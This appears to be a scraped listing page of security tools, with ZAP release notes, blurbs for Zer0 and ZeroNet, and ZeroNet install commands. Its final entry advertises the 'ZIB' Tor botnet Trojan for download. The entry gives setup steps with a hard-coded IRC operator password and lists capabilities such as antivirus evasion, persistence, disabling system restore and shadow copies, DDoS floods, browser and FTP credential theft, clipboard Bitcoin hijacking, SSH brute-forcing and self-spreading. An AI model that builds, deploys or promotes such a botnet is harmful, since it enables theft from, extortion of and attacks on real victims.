    you need to have installed Python (2.7), PyQt4, and sqlite3


    Download YaVol

    ZAP 2.4.2 - Penetration Testing Tool for Testing Web Applications


    The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

    It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

    ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

    Release 2.4.2

    The following changes were made in this release:

    Enhancements:
    • Issue 1306 : Java PermSize command line flag removed in Java 8
    • Issue 1593 : Auto-scroll in Spider tab
    • Issue 1600 : Dont report X-Frame-Options alert on 403 and 404 pages
    • Issue 1654 : httpSessions/createEmptySession should initialize a site that was not previously visited
    • Issue 1702 : Add "recurse" option to the spider API
    • Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
    • Issue 1766 : Remove context via the API
    • Issue 1768 : Update to use a more recent user-agent
    • Issue 1778 : Passive scan AJAX spider requests
    • Issue 1790 : Move Buffer Overflow Scanner from Beta to Release
    • Issue 1793 : Allow active scan scripts to check if the scan was stopped
    • Issue 1795 : Allow JVM options to be configured via GUI
    • Issue 1799 : Minor Feature Request: Allow URL to be pasted into start Spider dialog.
    • Issue 1802 : Minor Enhancement: Change active Pause Button to a Play button
    • Issue 1849 : Option to merge related issues in reports
    • Issue 1857 : Libraries that were updated
    • Issue 1865 : Increase maximum db size

    Bug fixes:
    • Issue 1760 : Unable to initialize home directory! xml/config.xml (No such file or directory)
    • Issue 1763 : Automatic check for updates fails to report new versions
    • Issue 1770 : Exceptions when calling (some) context API actions in daemon mode
    • Issue 1771 : For OSX the zap.sh in the core download hard-codes the relative java location
    • Issue 1772 : On OS X, Found Java version lies
    • Issue 1777 : "Cannot locate configuration source null.policy" after opening "Active Scan" dialogue
    • Issue 1781 : ZAP errors with "Unsupported option '-psn_x_xxxxxxx'" on OS X
    • Issue 1784 : NullPointerException when active scanning through the API with a target without scheme
    • Issue 1785 : Plugin enabled even if dependencies are not, "hangs" active scan
    • Issue 1787 : Context not used by the Spider even if selected
    • Issue 1788 : Scan Progress Pane Needs Sorting Change
    • Issue 1789 : Forced Browse/AJAX Spider messages not restored to Sites tab
    • Issue 1792 : Report not generated in daemon mode
    • Issue 1798 : Stop Attack Feature Locks up ZAP?
    • Issue 1804 : Disable processing of XML external entities by default
    • Issue 1805 : ZAP API might not return the response in requested format on errors
    • Issue 1858 : Spider might report wrong progress after finishing
    • Issue 1872 : EDT accessed in daemon mode

    Zer0 - Secured file deletion made easy


    Zer0 is a user friendly file deletion tool with a high level of security.

    With Zer0, you'll be able to delete files and to prevent file recovery by a 3rd person. So far, no user reported an efficient method to recover a file deleted by Zer0.

    Features
    • User friendly HMI : Drag'n'drop, 1 click and the job is done !
    • High security file deletion algorithm
    • Multithreaded application core : Maximum efficiency without freezing the application.
    • Internationalization support.

    ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network


    Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io

    Why?
    • We believe in open, free, and uncensored network and communication.
    • No single point of failure: Site remains online so long as at least 1 peer serving it.
    • No hosting costs: Sites are served by visitors.
    • Impossible to shut down: It's nowhere because it's everywhere.
    • Fast and works offline: You can access the site even if your internet is unavailable.

    Features
    • Real-time updated sites
    • Namecoin .bit domains support
    • Easy to setup: unpack & run
    • Clone websites in one click
    • Password-less BIP32 based authorization: Your account is protected by same cryptography as your Bitcoin wallet
    • Built-in SQL server with P2P data synchronization: Allows easier site development and faster page load times
    • Tor network support
    • TLS encrypted connections
    • Automatic, uPnP port opening
    • Plugin for multiuser (openproxy) support
    • Works with any browser/OS

    How does it work?
    • After starting zeronet.py you will be able to visit zeronet sites using http://127.0.0.1:43110/{zeronet_address} (eg. http://127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr).
    • When you visit a new zeronet site, it tries to find peers using the BitTorrent network so it can download the site files (html, css, js...) from them.
    • Each visited site becomes also served by you.
    • Every site contains a site.json which holds all other files in a sha512 hash and a signature generated using site's private key.
    • If the site owner (who has the private key for the site address) modifies the site, then he/she signs the new content.json and publishes it to the peers. After the peers have verified the content.json integrity (using the signature), they download the modified files and publish the new content to other peers.

    How to join?

    Windows
    It downloads the latest version of ZeroNet then starts it automatically.

    Alternative method for Windows by installing Python

    Linux

    Debian
    • sudo apt-get update
    • sudo apt-get install msgpack-python python-gevent
    • wget https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
    • tar xvpfz master.tar.gz
    • cd ZeroNet-master
    • Start with python zeronet.py
    • Open http://127.0.0.1:43110/ in your browser and enjoy! :)

    Other Linux or without root access
    • Check your python version using python --version if the returned version is not Python 2.7.X then try python2 or python2.7 command and use it from now
    • wget https://bootstrap.pypa.io/get-pip.py
    • python get-pip.py --user gevent msgpack-python
    • Start with python zeronet.py

    Mac
    • Install Homebrew
    • brew install python
    • pip install gevent msgpack-python
    • Download, Unpack, run python zeronet.py

    Vagrant
    • vagrant up
    • Access VM with vagrant ssh
    • cd /vagrant
    • Run python zeronet.py --ui_ip 0.0.0.0
    • Open http://127.0.0.1:43110/ in your browser

    Docker


    Download ZeroNet

    ZIB - The Open Tor Botnet


    General information and instructions.

    The Open Tor Botnet requires the installation and configuration of bitcoind, however I neglect to detail this here out of a lack of time.
    This bot-net is fully undetectable and bypasses all antivirus through running on top of Python27's pyinstaller, which is used for many non-Trojan computer programs. The only hypothetical possibility of detection comes from the script, however, the script contains randomized-looking data through using a randomized AES key and initialization vector, meaning this is a non-issue.

    ZIB.py is the main project file.
    intel.py is the chat bot for handling automatic transactions and client authentication.
    compileZIB.py is used by intel.py, and is started in the background using chp.exe
    ZIB_imports.txt contains all the Python module imports that ZIB uses. They're appended to the script during compilation.
    btcpurchases.txt includes all the Bitcoin payments that are pending. Pending transactions older than 24 hours are deleted.
    channels.txt includes all completed BTC payments.
    Point your webserver to C:\Python27\dist\ for hosting the bot executables.
    chp.exe is required in the local dir.
    For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per ip set to 0 because tor users all connect from 127.0.0.1 and look the same to the IRCd. Keep all scripts in C:\Python27\Scripts.
    Put nircmd in the local directory for editing file dates.

    Features

    • ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
    • ZIB is coded totally from scratch.
    • ZIB uses the Department of Defense standard for encryption of Top Sercret files as one methods of generating fully undetectable binaries every time!
    • ZIB creates a new binary for every client with varying file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
    • ZIB is fully undetectable (FUD) to Anti-Virus.
    • ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
    • All bot networks on a ZIB network require a password to join.
    • ZIB uses passworded user-based authentication, handled through our Zlo intelligence bot, so you don't have to worry about channel password, main password, or bot compromise. Normal users can't create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
    • Paid users get unlimited bot space per channel.
    • Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.


    Features

    • Multi-threaded HTTP/s (layer7 [Methods: TorsHammer, PostIt, Hulk, ApacheKiller, Slowloris, GoldenEye]), TCP/SSL, and fine-tuned UDP flooding. Ability to flood hidden services, or attack via the clearnet. 66 randomized DDoS user-agents and referers. All methods send randomized data, bypass firewalls, filtering, and caching. ZIB also comes with FTP flood, and TeamSpeak flood.
    • Undetectable ad-fraud smart viewer that's fully compatible with Firefox, Tor Browser Bundle, Portable Firefox, Internet Explorer, Google Chrome, Opera, Yandex, Torch, FlashPeak SlimBrowser, Epic Privacy Browser, Baidu, Maxthon, Comodo IceDragon, and QupZilla.
    • Download & Execute w/ optional SHA256 verification.
    • Update w/ optional SHA256 verification.
    • Chrome password recovery.
    • Each bot can act as a shell booter and utilize external php shells for attacks.
    • Replace Bitcoin addresses in clipboard with yours.
    • FileZilla password recovery.
    • Fully routed through Tor.
    • File, registry, startup folder, and main/daemon/tor process persistence.
    • Installation and use is completely hidden from bots.
    • 0/60 Fully undetectable to Antivirus.
    • File download/upload.
    • Process status, creator, and killer.
    • Undetectable, instant obfuscation when generating new binaries.
    • Self spreading.
    • All bot files are SHA256 hash verified. Broken/corrupted files get replaced.
    • Bypasses AntiVirus Deep-Scan.
    • Bot location varies, depending on administrative access.
    • IRC nickname format: Country[version]windows version|CPU bits|User Privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may be having issues (shows up as 32-bit).
    • Disables various windows functions WITHOUT giving the user warnings!
    • Disables Microsoft Windows error reporting, sending additional data, and error logging - System-wide as administrator, and on a per-user basis.
    • Disables User Access Control (UAC) - System-wide as administrator, and on a per-user basis.
    • Disables Windows Volume Shadow Copy Backup Service (vss) - System-wide as administrator.
    • Disables System Restore Service (srservice) - System-Wide as administrator.
    • Disables System Restore - System-Wide as administrator.
    • Melts on execution. Original file gets deleted. Should delete the file out of the temporary folder, if used with a binder.
    • Multi-threaded mass SSH scanner that saves servers are on the bot's HDD encoded with base64 without duplicates, or honeypots. Four integrated password lists of increasing difficulty [A,B,C,D], or brute force with min/max characters (supports numbers, upper/lowercase letters, symbols). Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood requires having the routers download a python script, and the majority of routers won't have Python. Has the ability to be used to take down DDoS-protected servers from scanning with just one bot. The Open Tor Botnet optionally will scan under Tor, multiple ports at once, ip range/s [A/B/C] or randomized IPs, optionally block government IPs, blocks reserved IPv4 addresses aside from the user's LAN. BotKiller with file scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in AppData, Startup, etc and has been successful against NanoCore, Andromeda, AGhost Silent Miner, Plasma HTTP/IRC/RAT, and almost every HackForums bot. The botkiller utilizes process scanning with file deletion, and registry scanning.
    • Mutex. No duplicate IRC connections.
    • Amazing error handling, install rate, detection ratio, and persistence.
    • Completely native malware. No .NET framework, or Python installation required!
    • Installs to the startup folder & AppData with a registry RUN key.
    • Kills all popular anti-virus and prevents A/V installation. Will disable Anti-Virus which have rootkits, through deleting important A/V dlls.
    • BotKiller, scanner, and A/V killer are optional. You could easily run the Open Tor botnet as a back-up for your bots, or install other software on them as back-up. The network control system is highly scaleable. Duel-process and duel-file persistence. Files processes are re-created nearly instantly, after being removed.
    • Recovers File-Zilla logins, which is great for getting SSH, and FTP logins.
    • Automatically removes some ad-ware.
    • Contains an Omegle spreader which spreads either a link through social engineering tactics, or a Skype account with every line of text being completely unique in order to avoid detection. Always waits for the Omegle stranger to type a message before responding with a reply. Shows stranger typing, and writes messages human-like. Multi-threaded.
    • Deletes zone identifier on all bot files, Tor, download & executed files, and update files. This means that you don't get the "Would you like to run this program?" dialog, and it runs completely hidden.
    • Detects all Windows operating systems from Windows 95, ME, to 8. Will show Windows 10 as just Windows, or W8. Text-To-Speech with speaker detection.
    • Duplicate nick-name handling, and ping-out handling.
    • Tor is downloaded directly from the Tor Project - It only needs to be downloaded once, but still has persistence.
    • Grabs the bot IP address on startup, has the ability to disable/enable bot command response, view status of ssh scanner/omegle spreading/ddos/botkiller and start/stop them.
    • Functionality to kill the bot instance, uninstall ZIB, grab full OS info, check if a host on a certain port is online/offline using TCP connect and a full HTTP request whilst checking the reply for server status related information.
    • Check if a process is running, how many are running, and list directories. Use \ instead of C:\, e.x !dir \ as some people run their main operating system on non-standard drive letters, especially on servers.
    • Upload specific files of your choosing that exist on a bot's computer to your FTP server. Files that can be uploaded could include BTC wallets.
    • Read files in plain-text off zombie computers. View amount of scanned SSH servers. Kill processes. The bot will tell you about missing command parameters, if a certain parameter contains the wrong data-type, etc. Errors from executing a command are outputted to the IRC channel without flooding the chat.
    • Commands are ran mutli-threaded and con-currently. This means your bots wont freeze up each time you run a command.


    Download Zib-Trojan